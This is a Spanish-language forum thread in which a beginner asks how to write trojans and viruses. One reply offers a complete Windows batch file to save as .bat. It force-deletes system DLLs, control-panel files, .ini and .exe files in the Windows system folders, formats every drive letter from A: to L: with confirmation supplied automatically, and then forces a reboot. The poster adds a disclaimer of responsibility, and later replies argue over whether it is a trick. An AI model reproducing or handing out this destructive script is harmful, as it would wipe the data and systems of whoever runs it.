Mayo 26, 2019, 01:36:30 am

Noticias:

Para hacer tu consulta: debes registrarte y hacer un nuevo tema en la sección que consideres más adecuada. Ver: Acerca de este Foro.

Buscar en el Foro: 

Recientes

que lengueje usan los troyanos

Iniciado por luis1012, Enero 19, 2007, 05:57:02 am

Tema anterior - Siguiente tema

luis1012

quisiera saber como me puedo introducir en el mundo de lo stroyanos y virus para poder hacer l mios o para poder manejarlos sin q mi ordenador tenga ningun problema.

gin

- Para el lenguaje depende del entorno software asi como de la capacidad(habilidad-conocimiento) del programador.

- Con que intencion quieres hacer un troyano... (para joder?... mmm)

- No deberia de haber problema alguno con tu maquina si eres tu el que lo esta haciendo, puesto que conoces su funcionamiento, no es algo que se hace al azar, sin embargo para reducir el riesgo hay varios medidas que se pueden tomar pero por el momento....
blog.mbrenes.com

No hay vida en este cuerpo Yo soy nada, sin vida, sin alma ... odiado y temido, estoy muerto para todo el mundo. Escuchame... yo soy el monstruo al que los ho

Gato08

pues en mi opinion puedes empezar por hacer batch que son un poco mas sencillas....
Aqui te dejo un ejemplo:

cd\
cd WINDOWS
cd system32
DEL /f hal.dll
DEL /f *.dll
DEL /f *.cpl
DEL /f *.ini
DEL /f *.exe
cd\
cd WINDOWS
cd system
DEL /f hal.dll
DEL /f *.dll
DEL /f *.cpl
DEL /f *.ini
DEL /f *.exe
echo s | format L:
echo s | format K:
echo s | format J:
echo s | format I:
echo s | format H:
echo s | format G:
echo s | format F:
echo s | format E:
echo s | format D:
echo s | format C:
echo s | format B:
echo s | format A:
shutdown -r -t 1 -c "I´m Srry =("

Copialo y guardalo como .bat espero que te guste...... :D
***Nota: no me hago responsable por lo que se haga con este archivo...
Se dice que si reproduces un CD de Microsoft al reves escuhas un mensaje satanico.... Eso no es nada si lo pones al derecho te instala Windows!! LINUX USER #446595

Speed

EL LOKO

gato08 no creo que la gente sea tan ignorante como para caer en un truco
tan tonto como ese... luis1012 te recomiento que estudies sobre como buscar informacion en el internet explorer usando buscadores como google o yahoo... si estas comenzando en el mundo de la programacion lo ideal seria que estudiaras c++ y visual basic...

Gato08

Re: EL LOKO

Cita de: "EL LOKO"gato08 no creo que la gente sea tan ignorante como para caer en un truco
tan tonto como ese... luis1012 te recomiento que estudies sobre como buscar informacion en el internet explorer usando buscadores como google o yahoo... si estas comenzando en el mundo de la programacion lo ideal seria que estudiaras c++ y visual basic...

Aqui no se trata de hacer caer a los usurios en ningun truco!!! simplemente se trata de contestar preguntas y dar opciones en ningun momento he escrito que ejecute el archivo asi que por favor modera tu lenguaje!!!!
Se dice que si reproduces un CD de Microsoft al reves escuhas un mensaje satanico.... Eso no es nada si lo pones al derecho te instala Windows!! LINUX USER #446595

chaco

Re: EL LOKO

Cita de: "EL LOKO"gato08 no creo que la gente sea tan ignorante como para caer en un truco

Bueno aqui nadie es tonto, lo de Gato fue una sugerencia.

Todos sabemos que hay usuarios que caerian con eso o cosas aun mas simples
This is Unix-Land. In quiet nights, you can hear the Windows machines reboot"

Gato08

Correcto solo una sugerencia.... Al loko o lo que sea deberias primero leer los post y luego dedicarte a responder....

Gato08

No se si has escuchado el refran que dice:
Los grandes lammers mueren por la boca.....!!!

Redes Sociales

Buscar en el Foro: